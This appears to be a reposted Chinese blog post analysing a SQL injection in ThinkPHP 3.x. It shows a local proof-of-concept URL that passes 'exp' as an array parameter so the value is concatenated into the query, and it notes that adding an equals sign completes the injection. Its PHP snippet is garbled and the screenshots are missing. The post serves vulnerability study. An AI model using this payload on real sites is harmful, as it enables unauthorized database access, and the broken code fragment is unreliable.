阅读 177

Thinkphp 3.x exp注入(2)

标签:dump   inf   end   span   php   ima   load   array   com   

接着上篇来看 https://www.cnblogs.com/cuocuo/p/14329379.html

<? IndexController   =  = M(‘user‘)->where((‘id‘ => ))->}
}
http://127.0.0.1/?id=1

技术图片

 

 

 

 

$val是传入的1

这里可以看到$exp是$val[0]

如果等于bind或者exp,就直接拼接

所以我们构造http://127.0.0.1/?id[0]=exp&id[1]=2333

技术图片

 

可以看到SQL语句变成了SELECT * FROM `user` WHERE `Id` 2333 我们只需要在添加个等号即可注入

技术图片

 

Thinkphp 3.x exp注入(2)

标签:dump   inf   end   span   php   ima   load   array   com   

原文地址:https://www.cnblogs.com/cuocuo/p/14329868.html


文章分类
后端
文章标签
thinkphp
exp
版权声明:本站是系统测试站点,无实际运营。本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌抄袭侵权/违法违规的内容, 请发送邮件至 XXXXXXo@163.com 举报,一经查实,本站将立刻删除。
相关推荐